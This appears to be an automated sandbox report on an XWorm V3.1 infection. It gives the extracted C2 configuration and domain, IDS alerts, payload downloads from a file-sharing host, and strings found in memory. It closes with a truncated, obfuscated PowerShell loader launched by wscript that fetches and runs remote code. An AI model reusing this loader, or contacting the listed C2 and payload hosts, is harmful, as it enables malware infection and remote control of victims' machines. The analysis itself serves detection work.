Source: http://pesterbdd.com/images/Pester.png |
URL Reputation: Label: malware |
Source: rachesxwdavid.duckdns.org |
Avira URL Cloud: Label: malware |
Source: 00000011.00000002.2595172654.0000000021D41000.00000004.00000800.00020000.00000000.sdmp |
Malware Configuration Extractor: Xworm {"C2 url": ["rachesxwdavid.duckdns.org"], "Port": "8895", "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V3.1"} |
Source: unknown |
HTTPS traffic detected: 172.67.170.105:443 -> 192.168.2.9:49706 version: TLS 1.2 |
Source: unknown |
HTTPS traffic detected: 69.31.136.17:443 -> 192.168.2.9:49707 version: TLS 1.2 |
Source: unknown |
HTTPS traffic detected: 172.67.170.105:443 -> 192.168.2.9:49710 version: TLS 1.2 |
Source: unknown |
HTTPS traffic detected: 69.31.136.57:443 -> 192.168.2.9:49711 version: TLS 1.2 |
Source: |
Binary string: \??\C:\Windows\dll\System.Management.Automation.pdbZ source: powershell.exe, 0000000D.00000002.1845952673.0000000007091000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: qm.Core.pdb source: powershell.exe, 0000000D.00000002.1849554287.0000000008208000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 0000000D.00000002.1845952673.0000000007091000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: CallSite.Targetore.pdbS source: powershell.exe, 0000000D.00000002.1849045722.00000000081B0000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: \??\C:\Windows\System.Management.Automation.pdb source: powershell.exe, 0000000D.00000002.1845952673.0000000007091000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb source: powershell.exe, 0000000D.00000002.1849554287.0000000008208000.00000004.00000020.00020000.00000000.sdmp |
Source: Traffic |
Snort IDS: 2855924 ETPRO TROJAN Win32/XWorm V3 CnC Command - PING Outbound 192.168.2.9:49713 -> 57.128.155.22:8895 |
Source: Traffic |
Snort IDS: 2852874 ETPRO TROJAN Win32/XWorm CnC PING Command Inbound M2 57.128.155.22:8895 -> 192.168.2.9:49713 |
Source: Traffic |
Snort IDS: 2852870 ETPRO TROJAN Win32/XWorm CnC Checkin - Generic Prefix Bytes 57.128.155.22:8895 -> 192.168.2.9:49713 |
Source: global traffic |
HTTP traffic detected: GET /pro/dl/tbfvpd HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: www.sendspace.comConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /dlpro/85796124f5e308d921827e38e402c0c9/664f6de7/tbfvpd/Parnorpine.java HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: fs03n1.sendspace.comConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /pro/dl/dy1f16 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: www.sendspace.comCache-Control: no-cache |
Source: global traffic |
HTTP traffic detected: GET /dlpro/44141c5e47f518aa141f08f91a6c6e36/664f6e12/dy1f16/yBKPKDHbe243.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: fs13n5.sendspace.comConnection: Keep-AliveCookie: SID=asnkose8meuts76a32vtsvb0k7 |
Source: unknown |
UDP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: unknown |
UDP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: unknown |
UDP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: unknown |
UDP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: global traffic |
HTTP traffic detected: GET /pro/dl/tbfvpd HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: www.sendspace.comConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /dlpro/85796124f5e308d921827e38e402c0c9/664f6de7/tbfvpd/Parnorpine.java HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: fs03n1.sendspace.comConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /pro/dl/dy1f16 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: www.sendspace.comCache-Control: no-cache |
Source: global traffic |
HTTP traffic detected: GET /dlpro/44141c5e47f518aa141f08f91a6c6e36/664f6e12/dy1f16/yBKPKDHbe243.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: fs13n5.sendspace.comConnection: Keep-AliveCookie: SID=asnkose8meuts76a32vtsvb0k7 |
Source: global traffic |
DNS traffic detected: DNS query: www.sendspace.com |
Source: global traffic |
DNS traffic detected: DNS query: fs03n1.sendspace.com |
Source: global traffic |
DNS traffic detected: DNS query: fs13n5.sendspace.com |
Source: global traffic |
DNS traffic detected: DNS query: rachesxwdavid.duckdns.org |
Source: powershell.exe, 0000000D.00000002.1845952673.000000000706B000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://crl.m |
Source: powershell.exe, 00000009.00000002.1912177554.0000012C82226000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://fs03n1.sendspace.com |
Source: powershell.exe, 00000009.00000002.2000635803.0000012C90073000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1843333872.00000000055F8000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://nuget.org/NuGet.exe |
Source: powershell.exe, 0000000D.00000002.1840940042.00000000046E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1840251911.0000000000AD3000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://pesterbdd.com/images/Pester.png |
Source: powershell.exe, 00000009.00000002.1912177554.0000012C80001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1840940042.0000000004591000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000011.00000002.2595172654.0000000021D41000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name |
Source: powershell.exe, 0000000D.00000002.1840940042.00000000046E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1840251911.0000000000AD3000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html |
Source: powershell.exe, 00000009.00000002.1912177554.0000012C821EF000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://www.sendspace.com |
Source: powershell.exe, 00000009.00000002.1912177554.0000012C80001000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://aka.ms/pscore68 |
Source: powershell.exe, 0000000D.00000002.1840940042.0000000004591000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://aka.ms/pscore6lB |
Source: powershell.exe, 0000000D.00000002.1843333872.00000000055F8000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://contoso.com/ |
Source: powershell.exe, 0000000D.00000002.1843333872.00000000055F8000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://contoso.com/Icon |
Source: powershell.exe, 0000000D.00000002.1843333872.00000000055F8000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://contoso.com/License |
Source: powershell.exe, 00000009.00000002.1912177554.0000012C82213000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://fs03n1.sendspaX |
Source: powershell.exe, 00000009.00000002.1912177554.0000012C82213000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://fs03n1.sendspace.com |
Source: powershell.exe, 00000009.00000002.1912177554.0000012C8053E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1912177554.0000012C821EF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1912177554.0000012C8220F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1912177554.0000012C82213000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://fs03n1.sendspace.com/dlpro/85796124f5e308d921827e38e402c0c9/664f6de7/tbfvpd/Parnorpine.java |
Source: powershell.exe, 00000009.00000002.1912177554.0000012C8053E000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://fs03n1.sendspace.comx |
Source: wab.exe, 00000011.00000003.1839864776.00000000062E1000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000011.00000003.1826875899.00000000062E1000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://fs13n5.sendspace.com/ |
Source: wab.exe, 00000011.00000003.1826875899.00000000062E1000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://fs13n5.sendspace.com/Ezo8 |
Source: wab.exe, 00000011.00000003.1826875899.00000000062E1000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://fs13n5.sendspace.com/dlpro/44141c5e47f518aa141f08f91a6c6e36/664f6e12/dy1f16/yBKPKDHbe243.bin |
Source: wab.exe, 00000011.00000003.1826875899.00000000062E1000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://fs13n5.sendspace.com/om:443t |
Source: wab.exe, 00000011.00000003.1826875899.00000000062E1000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://fs13n5.sendspace.com/yz |
Source: powershell.exe, 0000000D.00000002.1840940042.00000000046E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1840251911.0000000000AD3000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://github.com/Pester/Pester |
Source: powershell.exe, 00000009.00000002.1912177554.0000012C8154F000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://go.micro |
Source: powershell.exe, 00000009.00000002.2000635803.0000012C90073000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1843333872.00000000055F8000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://nuget.org/nuget.exe |
Source: powershell.exe, 00000009.00000002.1912177554.0000012C8203C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1912177554.0000012C80227000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://www.sendspace.com |
Source: wab.exe, 00000011.00000002.2582688527.000000000629C000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://www.sendspace.com/ |
Source: wab.exe, 00000011.00000002.2594401027.0000000021320000.00000004.00001000.00020000.00000000.sdmp, wab.exe, 00000011.00000003.1826875899.00000000062E1000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000011.00000002.2582688527.00000000062B1000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://www.sendspace.com/pro/dl/dy1f16 |
Source: wab.exe, 00000011.00000003.1826875899.00000000062E1000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://www.sendspace.com/pro/dl/dy1f16/u28 |
Source: powershell.exe, 00000009.00000002.1912177554.0000012C80227000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://www.sendspace.com/pro/dl/tbfvpdP |
Source: powershell.exe, 0000000D.00000002.1840940042.00000000046E8000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://www.sendspace.com/pro/dl/tbfvpdXR |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49711 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49710 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49710 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49706 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49707 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49711 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49707 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49706 |
Source: unknown |
HTTPS traffic detected: 172.67.170.105:443 -> 192.168.2.9:49706 version: TLS 1.2 |
Source: unknown |
HTTPS traffic detected: 69.31.136.17:443 -> 192.168.2.9:49707 version: TLS 1.2 |
Source: unknown |
HTTPS traffic detected: 172.67.170.105:443 -> 192.168.2.9:49710 version: TLS 1.2 |
Source: unknown |
HTTPS traffic detected: 69.31.136.57:443 -> 192.168.2.9:49711 version: TLS 1.2 |
Source: amsi64_7308.amsi.csv, type: OTHER |
Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen |
Source: amsi32_7588.amsi.csv, type: OTHER |
Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen |
Source: Process Memory Space: powershell.exe PID: 7308, type: MEMORYSTR |
Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen |
Source: Process Memory Space: powershell.exe PID: 7588, type: MEMORYSTR |
Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen |
Source: C:\Windows\System32\wscript.exe |
Process created: Commandline size = 7125 |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process created: Commandline size = 7125 |
|
Source: C:\Windows\System32\wscript.exe |
Process created: Commandline size = 7125 |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process created: Commandline size = 7125 |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Coddle = 1;$Pararctalia='Su';$Pararctalia+='bstrin';$Pararctalia+='g';Function Tilsynsraads($Paradoxer){$Afprver=$Paradoxer.Length-$Coddle;For($Publikummer=5;$Publikummer -lt $Afprver;$Publikummer+=6){$Printerdefinitionerne+=$Paradoxer.$Pararctalia.Invoke( $Publikummer, $Coddle);}$Printerdefinitionerne;}function Handelsmssiges($Overimaginatively){& ($Nondiligently106) ($Overimaginatively);}$Toniskes=Tilsynsraads 'Mana,MWeddioFell,zUncomi C.pilNonbelstanga Ripo/Stakn5Forho.Mythi0 Unde Nonvo( DispW StaniEarthnU.vetdBrystoOutbiwUnives pakk Kirj.N eratTunst. Revo1Remit0tamgs.Brde.0 Rust;Tanch .onomWAntiriSansenomdri6Rip n4Lilje;M als AlloxDoxyc6Folkl4 marg;Oxa,i AmararGaskovRock,:Smile1Eleus2S.xte1recli. ,ndr0Ge.er)Henst BarbaGoutluegadsbcKindlkBumpio .lab/Capit2Vo.dt0Lenda1 She,0 Bus 0 her1Bes,y0Synge1Contr R.stiFDukkeiF.rberslingeEkspafEnteroImprexD,maj/Ureal1Lever2Polyp1 Micr. .gat0Buhko ';$Mellite=Tilsynsraads ' CranU Skams Txthe b rkrS.iff-PrenoALe.sigAlkohe VelsnMi.sitVoice ';$Overmuch=Tilsynsraads 'CurnehGemmitSievetRor.ypFr.bisE,xli:Lealn/Cara /T.ldfwTelotw E fawDamno.,orsmsKubepeTrkkrnUncubdNonlus verip SaloaInobtcAfleveSanda.Di.crc Syllo Wo,emS.ald/Bo.sepFe.rorSexbooKlapp/IntemdPhysilOu,ro/Daryltdisorbhe,vifLoadsv ,ephparr,udUfor. ';$Oscheolith=Tilsynsraads 'Sutte> Fluo ';$Nondiligently106=Tilsynsraads 'SkabeiDetrae.ligtxrub i ';$Taxaers='totemites';Handelsmssiges (Tilsynsraads 'HydroSObte.e SnostStipu-Aqua,CfoldeoSkuldn ,seut Bnd,e,aseknVerdetBlush Raps-StenrP.lotsaJern tTopo,hOkays S avkTCorra: Vara\Koer,FUdbrelKlippoTota pMandip Tid i OvernGymnoeOvervsGo alsStrmf.Unsa,t Ild.xDataot.dsta Rec.n-BlubbV aageaAbstilNonreuRan.feSlegf elon$Mist,Tmaraua Autox Rubia eloneMy derUnlansIncha;Forto ');Handelsmssiges (Tilsynsraads 'Behani Gra.fChalc Udfo ( sphotUdsigeKrukksWennitNy.ed-Paddop PlagavadostIngloh krue Ree eTStati:Hydro\ TobaF Semil,etstoLifesp F rmpD.spliForstnF iakeEs,ivsDk ensTer.i.Defort TechxCe trtLys.r)In ba{Srg,se Krusx,noggiMynd,ttilvi}Akti,; Kame ');$Strmpeholderens = Tilsynsraads 'G jstefornic Un thUnpawo Af r Rockw%SpatiaargolpAarempBu ked Nd aaSt,klt ScruaVictu%Va.id\ Und,Bm,llerEkspei Skama PagnrTelefbStrafeMisunrUnoblrMohamySprge.SekunM S.rdiEgnsplN kke Justi&Ell c&Lgelf rivieUnst cAdriah Likvo nage ,ape$Tactu ';Handelsmssiges (Tilsynsraads ' Nedf$NonligKoncelA |